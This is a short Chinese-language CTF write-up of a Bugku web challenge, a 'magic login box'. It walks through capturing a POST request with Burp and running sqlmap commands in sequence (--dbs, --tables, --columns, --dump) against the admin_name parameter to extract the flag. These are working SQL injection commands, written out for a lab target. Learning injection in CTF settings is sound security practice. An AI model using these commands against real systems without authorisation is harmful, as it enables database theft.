这是一个神奇的登录框(Bugku-web题 使用sqlmap注入实例)

正在学习sqlmap,拿这个题先入门一下。

题目链接:http://120.24.86.145:9001/sql/

先看下源代码:

这是一个神奇的登录框(Bugku-web题 使用sqlmap注入实例)_第1张图片

是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。

首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码)

这是一个神奇的登录框(Bugku-web题 使用sqlmap注入实例)_第2张图片

我保存到了D盘的1.txt里。

然后打开sqlmap,输入指令:sqlmap.py -r "D:\1.txt" -p admin_name --dbs

解释一下 -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了admin_name是注入点) --dbs意思是想获取数据库名字

可以看到sqlmap获得了数据库的名字:

这是一个神奇的登录框(Bugku-web题 使用sqlmap注入实例)_第3张图片

应该是这个bugkul1,再继续爆表,命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables

解释:-D是表示选择了后面的这个数据库 --tables是想获取表

可以看到爆出了表:

这是一个神奇的登录框(Bugku-web题 使用sqlmap注入实例)_第4张图片

应该在flag1这个表里,继续爆列名:

命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns

解释类似上面 不过加了一个-T 指定表

可以发现爆出了列名:

这是一个神奇的登录框(Bugku-web题 使用sqlmap注入实例)_第5张图片

flag1这个列 最后查字段 命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump

解释:同上面 --dump是获取字段的命令

(在这过程中可能会让你选择Y或者N 我直接回车的)

可以看到爆出了flag:

这是一个神奇的登录框(Bugku-web题 使用sqlmap注入实例)_第6张图片

你可能感兴趣的:(CTF)